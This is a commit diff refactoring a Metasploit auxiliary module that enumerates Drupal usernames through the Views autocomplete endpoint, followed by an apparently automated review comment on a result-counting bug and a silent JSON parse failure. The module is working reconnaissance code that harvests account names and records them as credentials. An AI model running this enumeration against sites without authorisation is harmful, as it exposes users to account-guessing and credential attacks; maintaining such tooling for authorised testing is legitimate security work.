Fix bugs in drupal_views_user_enum.

bug/bundler_fix
Roberto Soares 2015-10-04 05:53:54 -03:00
parent fc09eaf517
commit ed8f5456a4
1 changed files with 28 additions and 28 deletions


@ -44,19 +44,21 @@ class Metasploit3 < Msf::Auxiliary
end end
def check_host(ip) def check_host(ip)
res = send_request_cgi({ res = send_request_cgi(
'uri' => base_uri, 'uri' => base_uri,
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Connection' => 'Close' } 'headers' => { 'Connection' => 'Close' }
}, 25) )
if not res unless res
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<title\>Access denied/ end
if res.body.include?('Access denied')
# This probably means the Views Module actually isn't installed # This probably means the Views Module actually isn't installed
vprint_error("#{rhost} - Access denied") print_error("#{peer} - Access denied")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
elsif res and res.message != 'OK' or res.body != '[ ]' elsif res.message != 'OK' || res.body != '[ ]'
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
else else
return Exploit::CheckCode::Appears return Exploit::CheckCode::Appears
@ -94,59 +96,57 @@ class Metasploit3 < Msf::Auxiliary
return return
end end
print_status("Begin enumerating users at #{ip}") print_status("Begin enumerating users at #{vhost}")
results = [] results = []
('a'..'z').each do |l| ('a'..'z').each do |l|
vprint_status("Iterating on letter: #{l}") vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({ res = send_request_cgi(
'uri' => base_uri+l, 'uri' => "#{base_uri}#{l}",
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Connection' => 'Close' } 'headers' => { 'Connection' => 'Close' }
}, 25) )
if (res and res.message == "OK") if res && res.message == 'OK'
user_list = res.body.scan(/\w+/) begin
user_list = JSON.parse(res.body)
rescue JSON::ParserError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
return []
end
if user_list.empty? if user_list.empty?
vprint_line("\tFound: Nothing") vprint_error("Not found with: #{l}")
else else
vprint_line("\tFound: #{user_list.inspect}") vprint_good("Found: #{user_list}")
results << user_list results << user_list.flatten.uniq
end end
else else
print_error("Unexpected results from server") print_error("#{peer} - Unexpected results from server")
return return
end end
end end
final_results = results.flatten.uniq print_status("Done. #{results.length} usernames found...")
results.flatten.uniq.each do |user|
print_status("Done. " + final_results.length.to_s + " usernames found...")
final_results.each do |user|
print_good("Found User: #{user}") print_good("Found User: #{user}")
report_cred( report_cred(
ip: Rex::Socket.getaddress(datastore['RHOST']), ip: Rex::Socket.getaddress(datastore['RHOST']),
port: datastore['RPORT'], port: datastore['RPORT'],
user: user, user: user,
proof: base_uri+l proof: base_uri
) )
end end
# One username per line results = results * "\n"
final_results = final_results * "\n"
p = store_loot( p = store_loot(
'drupal_user', 'drupal_user',
'text/plain', 'text/plain',
Rex::Socket.getaddress(datastore['RHOST']), Rex::Socket.getaddress(datastore['RHOST']),
final_results.to_s, results.to_s,
'drupal_user.txt' 'drupal_user.txt'
) )
print_status("Usernames stored in: #{p}") print_status("Usernames stored in: #{p}")
end end
end end
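Review bot: In the second hunk, `results.length` in the new "Done." status line counts per-letter arrays rather than usernames, because the loop appends `user_list.flatten.uniq` as a single element per letter and the list is only flattened afterwards for the `report_cred` loop. The same nested, un-deduplicated list is then joined with `results * "\n"` for `store_loot`, so the loot file can repeat a name that matched several letters while the reported credentials do not. Flattening once right after the loop, `results = results.flatten.uniq`, would make the count, the reported credentials and the stored loot agree. Separately, the `rescue JSON::ParserError` branch returns `[]` after only an `elog`, which drops names already collected and shows nothing on the console; a `print_error("#{peer} - Unable to parse JSON response")` before the return would make the abort visible. The enclosing method begins outside the visible hunk.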